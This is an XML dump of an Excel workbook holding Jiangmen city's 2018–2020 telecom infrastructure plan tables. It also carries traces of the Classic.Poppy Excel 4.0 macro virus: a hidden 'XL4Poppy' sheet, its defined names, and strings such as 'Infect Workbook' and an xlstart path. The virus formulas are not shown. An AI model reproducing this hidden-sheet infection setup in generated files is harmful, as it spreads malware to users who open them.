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4295" windowHeight="5970" activeTab="4"/>
  </bookViews>
  <sheets>
    <sheet name="附件１" sheetId="1" r:id="rId1"/>
    <sheet name="附件2" sheetId="2" r:id="rId2"/>
    <sheet name="附件3" sheetId="3" r:id="rId3"/>
    <sheet name="附件4" sheetId="4" r:id="rId4"/>
    <sheet name="附件5" sheetId="5" r:id="rId5"/>
    <sheet name="XL4Poppy" sheetId="6" state="hidden" r:id="rId6"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId7"/>
    <externalReference r:id="rId8"/>
    <externalReference r:id="rId9"/>
  </externalReferences>
  <definedNames>
    <definedName name="Bust" localSheetId="5">XL4Poppy!$C$31</definedName>
    <definedName name="Continue" localSheetId="5">XL4Poppy!$C$9</definedName>
    <definedName name="Document_array" localSheetId="5">{"Book1","江网信信推(2018)9号附表1-5(赵艳庆,2018-08-06 10：19：24).xlsx"}</definedName>
    <definedName name="Documents_array" localSheetId="5">XL4Poppy!$B$1:$B$16</definedName>
    <definedName name="Hello">XL4Poppy!$A$15</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="0">附件１!$B$2:$Z$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="1">附件2!$B$1:$K$45</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="2">附件3!$B:$E</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="3">附件4!$B:$N</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="4">附件5!$B:$E</definedName>
    <definedName name="_xlnm.Print_Area">#REF!</definedName>
    <definedName name="Print_Area_MI">#REF!</definedName>
    <definedName name="半熟练工">[1]材料!$D$5</definedName>
    <definedName name="高级工">[1]材料!$D$3</definedName>
    <definedName name="전">#REF!</definedName>
    <definedName name="주택사업본부">#REF!</definedName>
    <definedName name="철구사업본부">#REF!</definedName>
    <definedName name="普工">[1]材料!$D$6</definedName>
    <definedName name="熟练工">[1]材料!$D$4</definedName>
    <definedName name="水">[1]材料!$D$336</definedName>
    <definedName name="投标时间">[1]材料!$C$2</definedName>
  </definedNames>
  <calcPr calcId="114210" fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/calcChain.xml><?xml version="1.0" encoding="utf-8"?>
<calcChain xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <c r="N14" i="4"/>
  <c r="M14"/>
  <c r="L14"/>
  <c r="N13"/>
  <c r="M13"/>
  <c r="L13"/>
  <c r="N12"/>
  <c r="M12"/>
  <c r="L12"/>
  <c r="N11"/>
  <c r="M11"/>
  <c r="L11"/>
  <c r="N10"/>
  <c r="M10"/>
  <c r="L10"/>
  <c r="N9"/>
  <c r="M9"/>
  <c r="L9"/>
  <c r="N8"/>
  <c r="M8"/>
  <c r="L8"/>
  <c r="N7"/>
  <c r="M7"/>
  <c r="L7"/>
  <c r="E25" i="2"/>
  <c r="E24"/>
  <c r="E23"/>
  <c r="E22"/>
  <c r="E21"/>
  <c r="E20"/>
  <c r="E19"/>
  <c r="Z15" i="1"/>
  <c r="Y15"/>
  <c r="X15"/>
  <c r="W15"/>
  <c r="V15"/>
  <c r="U15"/>
  <c r="Z14"/>
  <c r="Y14"/>
  <c r="X14"/>
  <c r="W14"/>
  <c r="V14"/>
  <c r="U14"/>
  <c r="Z13"/>
  <c r="Y13"/>
  <c r="X13"/>
  <c r="W13"/>
  <c r="V13"/>
  <c r="U13"/>
  <c r="Z12"/>
  <c r="Y12"/>
  <c r="X12"/>
  <c r="W12"/>
  <c r="V12"/>
  <c r="U12"/>
  <c r="Z11"/>
  <c r="Y11"/>
  <c r="X11"/>
  <c r="W11"/>
  <c r="V11"/>
  <c r="U11"/>
  <c r="Z10"/>
  <c r="Y10"/>
  <c r="X10"/>
  <c r="W10"/>
  <c r="V10"/>
  <c r="U10"/>
  <c r="Z9"/>
  <c r="Y9"/>
  <c r="X9"/>
  <c r="W9"/>
  <c r="V9"/>
  <c r="U9"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="241" uniqueCount="101">
  <si>
    <t>附件1</t>
  </si>
  <si>
    <t>全市电信企业新增光纤接入用户计划表</t>
  </si>
  <si>
    <t>单位：万户</t>
  </si>
  <si>
    <t>单位</t>
  </si>
  <si>
    <t>江门电信</t>
  </si>
  <si>
    <t>江门移动</t>
  </si>
  <si>
    <t>江门联通</t>
  </si>
  <si>
    <t>合计</t>
  </si>
  <si>
    <t>新增光纤接入
用户数</t>
  </si>
  <si>
    <t>新增100M以上
光纤接入用户数</t>
  </si>
  <si>
    <t>2018年</t>
  </si>
  <si>
    <t>2019年</t>
  </si>
  <si>
    <t>2020年</t>
  </si>
  <si>
    <t>全市</t>
  </si>
  <si>
    <t>蓬江</t>
  </si>
  <si>
    <t>江海</t>
  </si>
  <si>
    <t>新会</t>
  </si>
  <si>
    <t>鹤山</t>
  </si>
  <si>
    <t>台山</t>
  </si>
  <si>
    <t>开平</t>
  </si>
  <si>
    <t>恩平</t>
  </si>
  <si>
    <t>注：新增100M以上光纤接入用户数包括：新开通100M以上光纤接入用户数+原100M以下光纤升级用户数，因此该数值大于新增光纤接入用户数。</t>
  </si>
  <si>
    <t>附件2</t>
  </si>
  <si>
    <t>全市新增公众移动通信基站计划表</t>
  </si>
  <si>
    <t>单位：座</t>
  </si>
  <si>
    <t>新增基站数</t>
  </si>
  <si>
    <t>其中，新增4G基站数</t>
  </si>
  <si>
    <t>其中，新增5G基站数</t>
  </si>
  <si>
    <t>全市合计</t>
  </si>
  <si>
    <t>附件3</t>
  </si>
  <si>
    <t>全市新增铁塔站址计划表</t>
  </si>
  <si>
    <t>单位：个</t>
  </si>
  <si>
    <t>附件4</t>
  </si>
  <si>
    <t>全市新增NB-IoT基站计划表</t>
  </si>
  <si>
    <t>附件5</t>
  </si>
  <si>
    <t>江门市信息基础设施建设三年行动计划（2018-2020年）主要任务分解表</t>
  </si>
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>主要任务名称</t>
  </si>
  <si>
    <t>具体工作任务</t>
  </si>
  <si>
    <t>责任部门</t>
  </si>
  <si>
    <t>推动通信网络设施IPv6升级</t>
  </si>
  <si>
    <t>改造升级互联网骨干网互联节点，协调电信运营企业完成城域网和接入网的IPv6升级改造，开通面向公众用户和政企客户商用的IPv6宽带接入服务，开展LTE网络端到端IPv6业务承载能力建设。</t>
  </si>
  <si>
    <t>市网信统筹局、市文广新局，市委网信办，市通信建设管理办公室</t>
  </si>
  <si>
    <t>加快应用基础设施IPv6升级</t>
  </si>
  <si>
    <t>推动域名注册服务机构、顶级域运营机构、域名托管服务企业的域名服务器全面支持IPv6访问与解析；开展IPv6监测工作，提升对网络、应用、终端、用户、流量等指标的实时监测与分析能力。</t>
  </si>
  <si>
    <t>市网信统筹局，市委网信办，市通信建设管理办公室</t>
  </si>
  <si>
    <t>构建高速骨干光纤网络</t>
  </si>
  <si>
    <t>2020年底前，全市用户接入能力达到1000Mbps（兆比特/秒）</t>
  </si>
  <si>
    <t>市网信统筹局，市通信建设管理办公室</t>
  </si>
  <si>
    <t>建设千兆光网城市</t>
  </si>
  <si>
    <t>推进新建住宅建筑光纤到户，新城超前规划建设通信管道，分批次、成片区推进光纤改造，2020年底前电信运营企业将光网覆盖的住宅光纤用户普遍提速到100Mbps以上，基本实现“千兆光纤进小区、百兆光纤进家庭”。</t>
  </si>
  <si>
    <t>市网信统筹局、市住房城乡建设局、市城乡规划局、市文广新局，市通信建设管理办公室</t>
  </si>
  <si>
    <t>推进百兆光纤进农村</t>
  </si>
  <si>
    <t>实施乡村信息基础设施振兴工程，推进电信普遍服务试点。逐步推进20户以上自然村连通光缆。2020年底前，全市光网覆盖的农村光纤用户普遍提速到100Mbps以上，百兆用户占比达60%。</t>
  </si>
  <si>
    <t>市网信统筹局、市住房城乡建设局、市城乡规划局、市文广新局、市农业局、市扶贫办，市通信建设管理办公室</t>
  </si>
  <si>
    <t>推动4G网络深度覆盖</t>
  </si>
  <si>
    <t>2020年底前，实现4G网络在各市（区）城区和乡镇镇区100%连续覆盖，行政村100%覆盖，高速公路、国道、客运专线隧道外路段100%覆盖。</t>
  </si>
  <si>
    <t>市网信统筹局、市交通运输局、市公安局、市发展改革局、市公路局</t>
  </si>
  <si>
    <t>布局建设5G网络</t>
  </si>
  <si>
    <t>以5G网络站址布局为重点，2018年底前，制定江门市移动通信铁塔站址建设规划（2018-2022年）。2020年底前，我市全面启动5G网络规模化部署。</t>
  </si>
  <si>
    <t>江门铁塔公司，市网信统筹局、市住房城乡建设局、市城乡规划局、市国土资源局、市环境保护局、市交通运输局、市公路局、江门供电局</t>
  </si>
  <si>
    <t>推进NB-IoT建设应用</t>
  </si>
  <si>
    <t>2020年底前，全市NB-IoT网络实现普遍覆盖，业务需求重点区域深度覆盖，总连接数达200万个。</t>
  </si>
  <si>
    <t>市网信统筹局、市发展改革局、市文广新局</t>
  </si>
  <si>
    <t>推进有线无线卫星一体化融合发展</t>
  </si>
  <si>
    <t>积极配合省推进有线无线卫星融合网络关键技术研究和标准体系建设，探索构建广播电视网有线无线卫星一体化融合发展新模式，为推动广播电视信息化提供技术支撑。开发无线广播电视新功能，丰富无线广播电视业务形态和技术手段，推动广播电视频谱资源深度利用。</t>
  </si>
  <si>
    <t>市文广新局、广东广电网络江门分公司</t>
  </si>
  <si>
    <t>开放公共资源</t>
  </si>
  <si>
    <t>除法律法规另有规定外，无偿开放政府机关、事业单位、国有企业、交通站场等公共建筑或物业，为信息基础设施建设提供便利条件。</t>
  </si>
  <si>
    <t>市国土资源局、市住房城乡建设局、市城乡规划局、市交通运输局、市公安局、市国资委、市公路局，各市（区）政府</t>
  </si>
  <si>
    <t>推进“一杆多用”试点</t>
  </si>
  <si>
    <t>推广具有“一杆多用”功能的城市智慧灯杆的试点使用，建立杆塔资源共建共享和有偿使用制度。</t>
  </si>
  <si>
    <t>市住房城乡建设局、市网信统筹局、市国土资源局、市发展改革局、市公安局、市交通运输局、市文广新局、市公路局，各市（区）政府</t>
  </si>
  <si>
    <t>加大财政支持力度</t>
  </si>
  <si>
    <t>1.市财政统筹现有专项资金渠道支持信息基础设施建设，选取市场配置难以解决、需政府提供公共服务的关键环节给予重点扶持，大力支持公共资源开放、智慧杆塔推广应用、信息基础设施规划修编等工作。
2.各市、区要积极引导社会资本加大投资力度，加强对重点项目的融资支持，鼓励民间资本投资信息基础设施建设。</t>
  </si>
  <si>
    <t>市财政局、市网信统筹局、市发展改革局、市金融工作局，各市（区）政府</t>
  </si>
  <si>
    <t>加强用地保障</t>
  </si>
  <si>
    <t>1.各市、区政府对信息基础设施建设规划和铁塔站址等专项规划确定的建设项目要积极予以保障，及时将用地需求纳入土地利用总体规划和土地利用年度计划。
2.认真执行《国土资源部 发展改革委 科技部 工业和信息化部 住房和城乡建设部 商务部关于支持新产业新业态发展促进大众创业万众创新用地的意见》（国土资规〔2015〕5号）和《工业和信息化部 国土资源部 住房和城乡建设部关于加强移动通信铁塔站址用地及规划管理工作的通知》（工信部联通信〔2017〕234号）相关规定，通信基础设施项目可按公共设施用途落实用地。</t>
  </si>
  <si>
    <t>市国土资源局、市住房城乡建设局、市发展改革局、市网信统筹局，各市（区）政府</t>
  </si>
  <si>
    <t>提高审批效率</t>
  </si>
  <si>
    <t>1.针对通信基站铁塔站址报建问题，各市（区）规划、城市管理、公路等部门应按照省通信管理局统一制定的行业内报建资料文档格式和审批流程进行报建审批。
2.各市、区国土资源、城乡规划主管部门要针对铁塔站址建设的特点，简化申报、审批等操作性手续，为通信网络设施建设提供便利。
3.推行建设项目环境影响评价分类管理，基站项目由编制环境影响报告表改为填写环境影响登记表，实行备案管理，无需环保部门审批。
4江门供电局要将信息基础设施用电申请纳入报装绿色通道，简化报装程序，提高办理效率。</t>
  </si>
  <si>
    <t>市网信统筹局、市住房城乡建设局、市城乡规划局、市交通运输局、市国土资源局、市林业和园林局、市环境保护局、市发展改革局，江门供电局</t>
  </si>
  <si>
    <t>维护建设秩序</t>
  </si>
  <si>
    <t>1.各市、区政府要按照属地管理原则，负责协调解决本行政区域内阻挠施工、非法逼迁等妨碍信息基础设施建设与安全保护的行为，组织相关部门积极协调解决群众投诉集中的通信覆盖难点问题。
2.住房城乡建设（房地产）主管部门要督促物业服务企业支持配合住宅小区光纤、基站、有线电视接入机房和接入网等基础设施建设维护，严禁收取进场费、接入费、协调费、分摊费等不合理费用。
3.公安机关要联合通信管理、住房城乡建设等部门依法惩处破坏信息基础设施、阻挠信息基础设施建设维护、妨碍应急通信保障及通信设施抢修救险等违法行为。对因征地拆迁或城乡建设造成铁塔、基站、管线、机房等信息基础设施改动、迁移和损坏的，征收或工程主管部门要根据先建后拆和成本补偿原则，给予合理补偿并明确迁改路由。工程主管部门在改、拆建工程时，必须同时配套地下综合管道，无偿交付给管线单位使用。</t>
  </si>
  <si>
    <t>市公安局、市住房城乡建设局、市交通运输局、市工商局、市发展改革局、市国土资源局、市网信统筹局，各市（区）政府</t>
  </si>
  <si>
    <t>强化安全保障</t>
  </si>
  <si>
    <t>1.加强对全市网络与信息安全工作的统筹管理，健全网络与信息安全协调工作机制，落实电信和互联网企业等各类主体的安全责任。
2.全市信息基础设施规划、建设、运行要同步落实网络安全保护措施，做好安全测评和风险评估，确保符合国家网络安全等级保护标准要求。
3.严格执行广东省网络和信息安全标准体系，提升5G、IPv6、软件定义网络（SDN）等新技术安全防护能力，确保关键信息基础设施和用户信息安全。</t>
  </si>
  <si>
    <t>市网信统筹局、市公安局，市通信建设管理办公室</t>
  </si>
  <si>
    <t>江网信信推(2018)9号附表1-5(赵艳庆,2018-08-06 10：19：24).xlsx</t>
  </si>
  <si>
    <t>Book1</t>
  </si>
  <si>
    <t>C:\PROGRA~1\MICROS~2\OFFICE11\xlstart\Book1.</t>
  </si>
  <si>
    <t>**Auto and On Sheet Starts Here**</t>
  </si>
  <si>
    <t>Classic.Poppy by VicodinES</t>
  </si>
  <si>
    <t>With Lord Natas</t>
  </si>
  <si>
    <t>An Excel Formula Macro Virus (XF.Classic)</t>
  </si>
  <si>
    <t>Hydrocodone/APAP 10-650 For Your Computer</t>
  </si>
  <si>
    <t>(C) The Narkotic Network 1998</t>
  </si>
  <si>
    <t>**Simple Payload**</t>
  </si>
  <si>
    <t>**Set Our Values and Paths**</t>
  </si>
  <si>
    <t>**Add New Workbook, Infect It, Save It As Book1.xls**</t>
  </si>
  <si>
    <t>**Infect Workbook**</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="10">
    <numFmt numFmtId="41" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="43" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="176" formatCode="0.0_ "/>
    <numFmt numFmtId="177" formatCode="0_ "/>
    <numFmt numFmtId="178" formatCode="0.00_ "/>
    <numFmt numFmtId="179" formatCode="0.00_);[Red]\(0.00\)"/>
    <numFmt numFmtId="210" formatCode="_(&quot;$&quot;* #,##0_);_(&quot;$&quot;* \(#,##0\);_(&quot;$&quot;* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="211" formatCode="mmm\ dd\,\ yy"/>
    <numFmt numFmtId="212" formatCode="_(&quot;$&quot;* #,##0.0_);_(&quot;$&quot;* \(#,##0.0\);_(&quot;$&quot;* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="213" formatCode="mm/dd/yy_)"/>
  </numFmts>
  <fonts count="30">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="16"/>
      <color indexed="8"/>
      <name val="仿宋_GB2312"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="黑体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="仿宋_GB2312"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="黑体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="17"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="16"/>
      <name val="Helv"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color indexed="54"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="16"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="17"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="ＭＳ Ｐゴシック"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="바탕체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="蹈框"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="12">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5"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="42"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="43"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="41"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="8"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="1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5">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0"/>
    <xf numFmtId="38" fontId="16" fillId="4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="10" fontId="16" fillId="5" borderId="1" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0"/>
    <xf numFmtId="10" fontId="14" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="9" fontId="12" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="6" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="6" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="10" fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="38" fontId="24" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="40" fontId="24" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0"/>
    <xf numFmtId="210" fontId="19" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="211" fontId="19" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="212" fontId="19" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="213" fontId="19" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0"/>
    <xf numFmtId="41" fontId="18"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26" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="91">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">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lignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="righ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1" fontId="0" fillId="0" borderId="1"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177" fontId="0" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="5" borderId="6" xfId="11" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="5" borderId="8" xfId="11" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="3" borderId="0" xfId="23" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="23"/>
    <xf numFmtId="0" fontId="14" fillId="3" borderId="0" xfId="23" applyFill="1"/>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="18" xfId="23" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="14" fillId="9" borderId="13" xfId="23" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="28" fillId="10" borderId="19" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="11" borderId="20" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="10" borderId="20" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="10" borderId="21" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="9" borderId="22" xfId="23" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="23" xfId="23" applyFill="1" applyBorder="1"/>
